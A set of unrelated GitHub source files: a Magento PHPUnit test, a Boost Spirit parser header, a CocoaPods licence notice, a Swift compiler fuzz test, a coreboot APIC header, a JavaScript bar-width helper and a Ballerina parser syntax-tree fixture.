This works because browsers are required to perform a _preflight_ request
before sending
<?php
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
namespace Magento\Customer\Test\Unit\Model\Address\Config;
class ReaderTest extends \PHPUnit\Framework\TestCase
{
/**
* @var \Magento\Customer\Model\Address\Config\Reader
*/
protected $_model;
/**
* @var \Magento\Framework\Config\FileResolverInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_fileResolverMock;
/**
* @var \Magento\Customer\Model\Address\Config\Converter|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_converter;
/**
* @var \Magento\Customer\Model\Address\Config\SchemaLocator
*/
protected $_schemaLocator;
/**
* @var \Magento\Framework\Config\ValidationStateInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_validationState;
protected function setUp()
{
$this->_fileResolverMock = $this->createMock(\Magento\Framework\Config\FileResolverInterface::class);
$this->_fileResolverMock->expects(
$this->once()
)->method(
'get'
)->with(
'address_formats.xml',
'scope'
)->will(
$this->returnValue(
[
file_get_contents(__DIR__ . '/_files/formats_one.xml'),
file_get_contents(__DIR__ . '/_files/formats_two.xml'),
]
)
);
$this->_converter = $this->createPartialMock(
\Magento\Customer\Model\Address\Config\Converter::class,
['convert']
);
$moduleReader = $this->createPartialMock(\Magento\Framework\Module\Dir\Reader::class, ['getModuleDir']);
$moduleReader->expects(
$this->once()
)->method(
'getModuleDir'
)->with(
'etc',
'Magento_Customer'
)->will(
$this->returnValue('stub')
);
$this->_schemaLocator = new \Magento\Customer\Model\Address\Config\SchemaLocator($moduleReader);
$this->_validationState = $this->createMock(\Magento\Framework\Config\ValidationStateInterface::class);
$this->_validationState->expects($this->any())
->method('isValidationRequired')
->willReturn(false);
$this->_model = new \Magento\Customer\Model\Address\Config\Reader(
$this->_fileResolverMock,
$this->_converter,
$this->_schemaLocator,
$this->_validationState
);
}
public function testRead()
{
$expectedResult = new \stdClass();
$constraint = function (\DOMDocument $actual) {
try {
$expected = __DIR__ . '/_files/formats_merged.xml';
\PHPUnit\Framework\Assert::assertXmlStringEqualsXmlFile($expected, $actual->saveXML());
return true;
} catch (\PHPUnit\Framework\AssertionFailedError $e) {
return false;
}
};
$this->_converter->expects(
$this->once()
)->method(
'convert'
)->with(
$this->callback($constraint)
)->will(
$this->returnValue($expectedResult)
);
$this->assertSame($expectedResult, $this->_model->read('scope'));
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2001-2011 Hartmut Kaiser
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#if !defined(SPIRIT_SEQUENCE_APR_22_2006_0811AM)
#define SPIRIT_SEQUENCE_APR_22_2006_0811AM
#if defined(_MSC_VER)
#pragma once
#endif
#include <boost/spirit/home/qi/operator/sequence_base.hpp>
#include <boost/spirit/home/qi/detail/fail_function.hpp>
#include <boost/spirit/home/qi/meta_compiler.hpp>
namespace boost { namespace spirit
{
///////////////////////////////////////////////////////////////////////////
// Enablers
///////////////////////////////////////////////////////////////////////////
template <>
struct use_operator<qi::domain, proto::tag::shift_right> // enables >>
: mpl::true_ {};
template <>
struct flatten_tree<qi::domain, proto::tag::shift_right> // flattens >>
: mpl::true_ {};
}}
namespace boost { namespace spirit { namespace qi
{
template <typename Elements>
struct sequence : sequence_base<sequence<Elements>, Elements>
{
friend struct sequence_base<sequence<Elements>, Elements>;
sequence(Elements const& elements)
: sequence_base<sequence<Elements>, Elements>(elements) {}
private:
template <typename Iterator, typename Context, typename Skipper>
static detail::fail_function<Iterator, Context, Skipper>
fail_function(
Iterator& first, Iterator const& last
, Context& context, Skipper const& skipper)
{
return detail::fail_function<Iterator, Context, Skipper>
(first, last, context, skipper);
}
std::string id() const { return "sequence"; }
};
///////////////////////////////////////////////////////////////////////////
// Parser generators: make_xxx function (objects)
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Modifiers>
struct make_composite<proto::tag::shift_right, Elements, Modifiers>
: make_nary_composite<Elements, sequence>
{};
// ///////////////////////////////////////////////////////////////////////////
// // Define what attributes are compatible with a sequence
// template <typename Attribute, typename Elements, typename Context, typename Iterator>
// struct is_attribute_compatible<Attribute, sequence<Elements>, Context, Iterator>
// : mpl::or_<
// is_convertible<Attribute
// , typename traits::attribute_of<sequence<Elements>, Context, Iterator>::type>
// , traits::is_fusion_sequence_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// , traits::is_container_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// >
// {};
}}}
namespace boost { namespace spirit { namespace traits
{
///////////////////////////////////////////////////////////////////////////
template <typename Elements>
struct has_semantic_action<qi::sequence<Elements> >
: nary_has_semantic_action<Elements> {};
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Attribute, typename Context
, typename Iterator>
struct handles_container<qi::sequence<Elements>, Attribute, Context
, Iterator>
: mpl::true_ {};
}}}
#endif
|
{
"pile_set_name": "Github"
}
| null | null |
# Acknowledgements
This application makes use of the following third party libraries:
## WHUCalendar
Copyright (c) 2016 tiger8888 <seekarmor@139.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Generated by CocoaPods - https://cocoapods.org
|
{
"pile_set_name": "Github"
}
| null | null |
// Distributed under the terms of the MIT license
// Test case submitted to project by https://github.com/practicalswift (practicalswift)
// Test case found by fuzzing
class A{class d<T where f:A{var b{typealias e=a.c
|
{
"pile_set_name": "Github"
}
| null | null |
/* SPDX-License-Identifier: GPL-2.0 */
/*
* From coreboot file of same name
*
* Copyright (C) 2014 Google, Inc
*/
#ifndef _ARCH_ASM_LAPIC_H
#define _ARCH_ASM_LAPIC_H
#define LAPIC_DEFAULT_BASE 0xfee00000
#define LAPIC_ID 0x020
#define LAPIC_LVR 0x030
#define LAPIC_TASKPRI 0x080
#define LAPIC_TPRI_MASK 0xff
#define LAPIC_RRR 0x0c0
#define LAPIC_SPIV 0x0f0
#define LAPIC_SPIV_ENABLE 0x100
#define LAPIC_ICR 0x300
#define LAPIC_DEST_SELF 0x40000
#define LAPIC_DEST_ALLINC 0x80000
#define LAPIC_DEST_ALLBUT 0xc0000
#define LAPIC_ICR_RR_MASK 0x30000
#define LAPIC_ICR_RR_INVALID 0x00000
#define LAPIC_ICR_RR_INPROG 0x10000
#define LAPIC_ICR_RR_VALID 0x20000
#define LAPIC_INT_LEVELTRIG 0x08000
#define LAPIC_INT_ASSERT 0x04000
#define LAPIC_ICR_BUSY 0x01000
#define LAPIC_DEST_LOGICAL 0x00800
#define LAPIC_DM_FIXED 0x00000
#define LAPIC_DM_LOWEST 0x00100
#define LAPIC_DM_SMI 0x00200
#define LAPIC_DM_REMRD 0x00300
#define LAPIC_DM_NMI 0x00400
#define LAPIC_DM_INIT 0x00500
#define LAPIC_DM_STARTUP 0x00600
#define LAPIC_DM_EXTINT 0x00700
#define LAPIC_VECTOR_MASK 0x000ff
#define LAPIC_ICR2 0x310
#define GET_LAPIC_DEST_FIELD(x) (((x) >> 24) & 0xff)
#define SET_LAPIC_DEST_FIELD(x) ((x) << 24)
#define LAPIC_LVT0 0x350
#define LAPIC_LVT1 0x360
#define LAPIC_LVT_MASKED (1 << 16)
#define LAPIC_LVT_LEVEL_TRIGGER (1 << 15)
#define LAPIC_LVT_REMOTE_IRR (1 << 14)
#define LAPIC_INPUT_POLARITY (1 << 13)
#define LAPIC_SEND_PENDING (1 << 12)
#define LAPIC_LVT_RESERVED_1 (1 << 11)
#define LAPIC_DELIVERY_MODE_MASK (7 << 8)
#define LAPIC_DELIVERY_MODE_FIXED (0 << 8)
#define LAPIC_DELIVERY_MODE_NMI (4 << 8)
#define LAPIC_DELIVERY_MODE_EXTINT (7 << 8)
unsigned long lapic_read(unsigned long reg);
void lapic_write(unsigned long reg, unsigned long v);
void enable_lapic(void);
void disable_lapic(void);
unsigned long lapicid(void);
int lapic_remote_read(int apicid, int reg, unsigned long *pvalue);
void lapic_setup(void);
#endif
|
{
"pile_set_name": "Github"
}
| null | null |
import {barFraction, barEnd} from "../constants";
export default function barWidth(array) {
const n = array.length;
if (n === 0) return 0;
if (n === 1) return barFraction;
return (barFraction - barEnd * (n - 1)) / n;
}
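The helper divides a fixed fraction of a band among `n` bars, reserving `barEnd` of spacing between adjacent bars. A minimal self-contained sketch, with illustrative stand-in values for the imported `barFraction` and `barEnd` constants (the library's actual values may differ):

```javascript
// Assumed constants for illustration only — not the library's real values.
const barFraction = 0.8; // share of the band occupied by bars
const barEnd = 0.1;      // gap between adjacent bars

function barWidth(array) {
  const n = array.length;
  if (n === 0) return 0;            // no bars, no width
  if (n === 1) return barFraction;  // a lone bar takes the whole fraction
  // n bars share the fraction minus the (n - 1) inter-bar gaps
  return (barFraction - barEnd * (n - 1)) / n;
}

console.log(barWidth([]));        // 0
console.log(barWidth([1]));       // 0.8
console.log(barWidth([1, 2, 3])); // (0.8 - 0.1 * 2) / 3 ≈ 0.2
```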
|
{
"pile_set_name": "Github"
}
| null | null |
{
"kind": "FUNCTION_DEFINITION",
"children": [
{
"kind": "LIST",
"children": []
},
{
"kind": "FUNCTION_KEYWORD",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "IDENTIFIER_TOKEN",
"value": "foo"
},
{
"kind": "FUNCTION_SIGNATURE",
"children": [
{
"kind": "OPEN_PAREN_TOKEN"
},
{
"kind": "LIST",
"children": []
},
{
"kind": "CLOSE_PAREN_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "FUNCTION_BODY_BLOCK",
"children": [
{
"kind": "OPEN_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
},
{
"kind": "LIST",
"children": [
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
},
{
"kind": "COMMENT_MINUTIAE",
"value": "// DecimalNumber FloatingPointTypeSuffix"
},
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
},
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25f"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25F"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25d"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25D"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
},
{
"kind": "CLOSE_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
}
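The tree above is lossless: every token carries its text in `value`, and the surrounding whitespace, newlines, and comments are attached as leading/trailing minutiae, so concatenating a depth-first walk reproduces the original source exactly. The walker below is an illustration of that property, not tooling from the repository; note that in the sketch the `EQUAL_TOKEN` and `SEMICOLON_TOKEN` nodes are given explicit `value` fields, whereas in the tree above the token text is implied by the kind.

```python
def render(node):
    """Reassemble source text from a minutiae-bearing syntax tree node."""
    out = []

    def walk(n):
        for m in n.get("leadingMinutiae", []):
            out.append(m.get("value", ""))
        if "children" in n:
            for child in n["children"]:
                walk(child)
        else:
            out.append(n.get("value", ""))  # leaf token text
        for m in n.get("trailingMinutiae", []):
            out.append(m.get("value", ""))

    walk(node)
    return "".join(out)


# A trimmed-down copy of the first ASSIGNMENT_STATEMENT above.
stmt = {
    "kind": "ASSIGNMENT_STATEMENT",
    "children": [
        {"kind": "SIMPLE_NAME_REFERENCE", "children": [
            {"kind": "IDENTIFIER_TOKEN", "value": "a",
             "leadingMinutiae": [{"kind": "WHITESPACE_MINUTIAE", "value": "    "}],
             "trailingMinutiae": [{"kind": "WHITESPACE_MINUTIAE", "value": " "}]}]},
        {"kind": "EQUAL_TOKEN", "value": "=",
         "trailingMinutiae": [{"kind": "WHITESPACE_MINUTIAE", "value": " "}]},
        {"kind": "NUMERIC_LITERAL", "children": [
            {"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN", "value": "25f"}]},
        {"kind": "SEMICOLON_TOKEN", "value": ";",
         "trailingMinutiae": [{"kind": "END_OF_LINE_MINUTIAE", "value": "\n"}]},
    ],
}

print(repr(render(stmt)))  # → '    a = 25f;\n'
```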
|
{
"pile_set_name": "Github"
}
| null | null |